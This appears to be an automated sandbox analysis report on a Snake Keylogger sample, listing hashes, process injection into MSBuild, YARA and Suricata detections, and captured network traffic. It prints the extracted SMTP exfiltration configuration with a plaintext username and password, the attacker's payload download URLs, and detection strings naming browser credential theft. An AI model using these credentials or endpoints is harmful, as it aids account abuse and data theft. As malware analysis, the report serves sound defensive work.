Edit tour

Windows Analysis Report
R86BRY7DdC.exe

Overview

General Information

Sample name:	R86BRY7DdC.exe renamed because original name is a hash value
Original sample name:	728aacf77f919b92f4bc04b4dec7898345dc57f0080fe09f16290ce424671767.exe
Analysis ID:	1483419
MD5:	d747188c998cbd80a03250d578236e29
SHA1:	cb2aff28e4271a441d0e55dce58783fb224902ab
SHA256:	728aacf77f919b92f4bc04b4dec7898345dc57f0080fe09f16290ce424671767
Tags:	exeinvestdirectinsurance-com
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

R86BRY7DdC.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\R86BRY7DdC.exe" MD5: D747188C998CBD80A03250D578236E29)

MSBuild.exe (PID: 6376 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 6400 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@arvet-jo.com", "Password": "aIVs)Mt2Y+u[", "Host": "mail.arvet-jo.com", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1489f:$a1: get_encryptedPassword 0x14b8b:$a2: get_encryptedUsername 0x146ab:$a3: get_timePasswordChanged 0x147a6:$a4: get_passwordField 0x148b5:$a5: set_encryptedPassword 0x15f0b:$a7: get_logins 0x15e6e:$a10: KeyLoggerEventArgs 0x15ad9:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18248:$x1: $%SMTPDV$ 0x182ae:$x2: $#TheHashHere%& 0x198e5:$x3: %FTPDV$ 0x199cf:$x4: $%TelegramDv$ 0x15ad9:$x5: KeyLoggerEventArgs 0x15e6e:$x5: KeyLoggerEventArgs 0x19909:$m2: Clipboard Logs ID 0x19b1f:$m2: Screenshot Logs ID 0x19c2f:$m2: keystroke Logs ID 0x19f09:$m3: SnakePW 0x19af7:$m4: \SnakeKeylogger\
00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13b0af:$a1: get_encryptedPassword 0x15b8e7:$a1: get_encryptedPassword 0x13b39b:$a2: get_encryptedUsername 0x15bbd3:$a2: get_encryptedUsername 0x13aebb:$a3: get_timePasswordChanged 0x15b6f3:$a3: get_timePasswordChanged 0x13afb6:$a4: get_passwordField 0x15b7ee:$a4: get_passwordField 0x13b0c5:$a5: set_encryptedPassword 0x15b8fd:$a5: set_encryptedPassword 0x13c71b:$a7: get_logins 0x15cf53:$a7: get_logins 0x13c67e:$a10: KeyLoggerEventArgs 0x15ceb6:$a10: KeyLoggerEventArgs 0x13c2e9:$a11: KeyLoggerEventArgsEventHandler 0x15cb21:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x13ea58:$x1: $%SMTPDV$ 0x15f290:$x1: $%SMTPDV$ 0x13eabe:$x2: $#TheHashHere%& 0x15f2f6:$x2: $#TheHashHere%& 0x1400f5:$x3: %FTPDV$ 0x16092d:$x3: %FTPDV$ 0x1401df:$x4: $%TelegramDv$ 0x160a17:$x4: $%TelegramDv$ 0x13c2e9:$x5: KeyLoggerEventArgs 0x13c67e:$x5: KeyLoggerEventArgs 0x15cb21:$x5: KeyLoggerEventArgs 0x15ceb6:$x5: KeyLoggerEventArgs 0x140119:$m2: Clipboard Logs ID 0x14032f:$m2: Screenshot Logs ID 0x14043f:$m2: keystroke Logs ID 0x160951:$m2: Clipboard Logs ID 0x160b67:$m2: Screenshot Logs ID 0x160c77:$m2: keystroke Logs ID 0x140719:$m3: SnakePW 0x160f51:$m3: SnakePW 0x140307:$m4: \SnakeKeylogger\
00000002.00000002.4118139508.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: R86BRY7DdC.exe PID: 7148	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: R86BRY7DdC.exe PID: 7148	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: R86BRY7DdC.exe PID: 7148	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1611c:$a1: get_encryptedPassword 0x163fe:$a2: get_encryptedUsername 0x15f32:$a3: get_timePasswordChanged 0x1602d:$a4: get_passwordField 0x16132:$a5: set_encryptedPassword 0x1860b:$a7: get_logins 0x1856e:$a10: KeyLoggerEventArgs 0x181d9:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: R86BRY7DdC.exe PID: 7148	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x181d9:$x5: KeyLoggerEventArgs 0x1856e:$x5: KeyLoggerEventArgs 0x18dbc:$x5: KeyLoggerEventArgs 0x1911d:$x5: KeyLoggerEventArgs 0x1a7dd:$m2: Clipboard Logs ID 0x1a8cf:$m2: Screenshot Logs ID 0x1a925:$m2: keystroke Logs ID 0x1aa5a:$m3: SnakePW 0x1a8bb:$m4: \SnakeKeylogger\
Process Memory Space: MSBuild.exe PID: 6400	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 6400	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: MSBuild.exe PID: 6400	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x44e7e:$a1: get_encryptedPassword 0x45160:$a2: get_encryptedUsername 0x44c94:$a3: get_timePasswordChanged 0x44d8f:$a4: get_passwordField 0x44e94:$a5: set_encryptedPassword 0x4736d:$a7: get_logins 0x472d0:$a10: KeyLoggerEventArgs 0x46f3b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: MSBuild.exe PID: 6400	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x46f3b:$x5: KeyLoggerEventArgs 0x472d0:$x5: KeyLoggerEventArgs 0x47b1e:$x5: KeyLoggerEventArgs 0x47e7f:$x5: KeyLoggerEventArgs 0x4953f:$m2: Clipboard Logs ID 0x49631:$m2: Screenshot Logs ID 0x49687:$m2: keystroke Logs ID 0x497bc:$m3: SnakePW 0x4961d:$m4: \SnakeKeylogger\
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.MSBuild.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.MSBuild.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.MSBuild.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a9f:$a1: get_encryptedPassword 0x14d8b:$a2: get_encryptedUsername 0x148ab:$a3: get_timePasswordChanged 0x149a6:$a4: get_passwordField 0x14ab5:$a5: set_encryptedPassword 0x1610b:$a7: get_logins 0x1606e:$a10: KeyLoggerEventArgs 0x15cd9:$a11: KeyLoggerEventArgsEventHandler
2.2.MSBuild.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c4cb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b6fd:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bb30:$a4: \Orbitum\User Data\Default\Login Data 0x1cb6f:$a5: \Kometa\User Data\Default\Login Data
2.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15681:$s1: UnHook 0x15688:$s2: SetHook 0x15690:$s3: CallNextHook 0x1569d:$s4: _hook
2.2.MSBuild.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18448:$x1: $%SMTPDV$ 0x184ae:$x2: $#TheHashHere%& 0x19ae5:$x3: %FTPDV$ 0x19bcf:$x4: $%TelegramDv$ 0x15cd9:$x5: KeyLoggerEventArgs 0x1606e:$x5: KeyLoggerEventArgs 0x19b09:$m2: Clipboard Logs ID 0x19d1f:$m2: Screenshot Logs ID 0x19e2f:$m2: keystroke Logs ID 0x1a109:$m3: SnakePW 0x19cf7:$m4: \SnakeKeylogger\
0.2.R86BRY7DdC.exe.12a0f610.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.R86BRY7DdC.exe.12a0f610.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.R86BRY7DdC.exe.12a0f610.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c9f:$a1: get_encryptedPassword 0x12f8b:$a2: get_encryptedUsername 0x12aab:$a3: get_timePasswordChanged 0x12ba6:$a4: get_passwordField 0x12cb5:$a5: set_encryptedPassword 0x1430b:$a7: get_logins 0x1426e:$a10: KeyLoggerEventArgs 0x13ed9:$a11: KeyLoggerEventArgsEventHandler
0.2.R86BRY7DdC.exe.12a0f610.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a6cb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x198fd:$a3: \Google\Chrome\User Data\Default\Login Data 0x19d30:$a4: \Orbitum\User Data\Default\Login Data 0x1ad6f:$a5: \Kometa\User Data\Default\Login Data
0.2.R86BRY7DdC.exe.12a0f610.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13881:$s1: UnHook 0x13888:$s2: SetHook 0x13890:$s3: CallNextHook 0x1389d:$s4: _hook
0.2.R86BRY7DdC.exe.12a0f610.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16648:$x1: $%SMTPDV$ 0x166ae:$x2: $#TheHashHere%& 0x17ce5:$x3: %FTPDV$ 0x17dcf:$x4: $%TelegramDv$ 0x13ed9:$x5: KeyLoggerEventArgs 0x1426e:$x5: KeyLoggerEventArgs 0x17d09:$m2: Clipboard Logs ID 0x17f1f:$m2: Screenshot Logs ID 0x1802f:$m2: keystroke Logs ID 0x18309:$m3: SnakePW 0x17ef7:$m4: \SnakeKeylogger\
0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a9f:$a1: get_encryptedPassword 0x352d7:$a1: get_encryptedPassword 0x14d8b:$a2: get_encryptedUsername 0x355c3:$a2: get_encryptedUsername 0x148ab:$a3: get_timePasswordChanged 0x350e3:$a3: get_timePasswordChanged 0x149a6:$a4: get_passwordField 0x351de:$a4: get_passwordField 0x14ab5:$a5: set_encryptedPassword 0x352ed:$a5: set_encryptedPassword 0x1610b:$a7: get_logins 0x36943:$a7: get_logins 0x1606e:$a10: KeyLoggerEventArgs 0x368a6:$a10: KeyLoggerEventArgs 0x15cd9:$a11: KeyLoggerEventArgsEventHandler 0x36511:$a11: KeyLoggerEventArgsEventHandler
0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c4cb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cd03:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b6fd:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bf35:$a3: \Google\Chrome\User Data\Default\Login Data 0x1bb30:$a4: \Orbitum\User Data\Default\Login Data 0x3c368:$a4: \Orbitum\User Data\Default\Login Data 0x1cb6f:$a5: \Kometa\User Data\Default\Login Data 0x3d3a7:$a5: \Kometa\User Data\Default\Login Data
0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15681:$s1: UnHook 0x35eb9:$s1: UnHook 0x15688:$s2: SetHook 0x35ec0:$s2: SetHook 0x15690:$s3: CallNextHook 0x35ec8:$s3: CallNextHook 0x1569d:$s4: _hook 0x35ed5:$s4: _hook
0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18448:$x1: $%SMTPDV$ 0x38c80:$x1: $%SMTPDV$ 0x184ae:$x2: $#TheHashHere%& 0x38ce6:$x2: $#TheHashHere%& 0x19ae5:$x3: %FTPDV$ 0x3a31d:$x3: %FTPDV$ 0x19bcf:$x4: $%TelegramDv$ 0x3a407:$x4: $%TelegramDv$ 0x15cd9:$x5: KeyLoggerEventArgs 0x1606e:$x5: KeyLoggerEventArgs 0x36511:$x5: KeyLoggerEventArgs 0x368a6:$x5: KeyLoggerEventArgs 0x19b09:$m2: Clipboard Logs ID 0x19d1f:$m2: Screenshot Logs ID 0x19e2f:$m2: keystroke Logs ID 0x3a341:$m2: Clipboard Logs ID 0x3a557:$m2: Screenshot Logs ID 0x3a667:$m2: keystroke Logs ID 0x1a109:$m3: SnakePW 0x3a941:$m3: SnakePW 0x19cf7:$m4: \SnakeKeylogger\
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 193.122.6.168, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6400, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 193.122.6.168

Timestamp:	2024-07-27T11:39:07.740293+0200
SID:	2803274
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 193.122.6.168

Timestamp:	2024-07-27T11:39:11.959037+0200
SID:	2803274
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 193.122.6.168

Timestamp:	2024-07-27T11:39:08.709920+0200
SID:	2803274
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 172.67.189.102

Timestamp:	2024-07-27T11:39:02.041719+0200
SID:	2803270
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.2.4 - Destination IP: 172.67.189.102

Timestamp:	2024-07-27T11:39:00.794915+0200
SID:	2803270
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T11:39:10.262138+0200
SID:	2803305
Source Port:	49734
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.68.123.157 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T11:39:57.966819+0200
SID:	2022930
Source Port:	443
Destination Port:	49752
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.68.123.157 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T11:39:19.816051+0200
SID:	2022930
Source Port:	443
Destination Port:	49740
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T11:39:12.575107+0200
SID:	2803305
Source Port:	49736
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-07-27T11:39:15.631472+0200
SID:	2803305
Source Port:	49738
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@arvet-jo.com", "Password": "aIVs)Mt2Y+u[", "Host": "mail.arvet-jo.com", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: R86BRY7DdC.exe	ReversingLabs: Detection: 42%
Source: R86BRY7DdC.exe	Virustotal: Detection: 32%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: R86BRY7DdC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Administrator\Desktop\Outputs\Abhekiso.pdb source: R86BRY7DdC.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 032CF055h	2_2_032CEE68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 032CF9DFh	2_2_032CEE68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_032CE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_032CEB9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_032CE9BB

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Ebagelog.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\R86BRY7DdC.exe

Code function: 0_2_00007FFD9B87166C InternetReadFile,

0_2_00007FFD9B87166C

Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Ebagelog.bd HTTP/1.1User-Agent: Mozilla/5.0Host: investdirectinsurance.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
